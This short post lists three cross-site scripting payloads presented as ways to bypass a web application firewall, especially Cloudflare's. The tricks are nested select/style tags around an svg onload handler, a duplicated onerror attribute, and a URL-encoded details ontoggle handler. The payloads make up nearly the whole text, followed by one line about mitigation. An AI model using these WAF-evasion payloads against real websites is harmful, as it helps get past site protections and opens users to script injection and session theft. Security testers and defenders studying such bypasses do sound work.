These payloads can be used for XSS WAF Bypass, especially on Cloudflare. The payloads are:
1. <select><style></select>
<svg onload=alert(1)></style>
2. ">><img src=x onerrora=confirm() onerror=confirm(1)>
3. <dETAILS%0aopen%0aonToGgle%0a%3d%0aa%3dprompt,a(origin) x>

These payloads can potentially evade the Cloudflare WAF protection. It's important to address and mitigate these vulnerabilities to ensure the security of the application.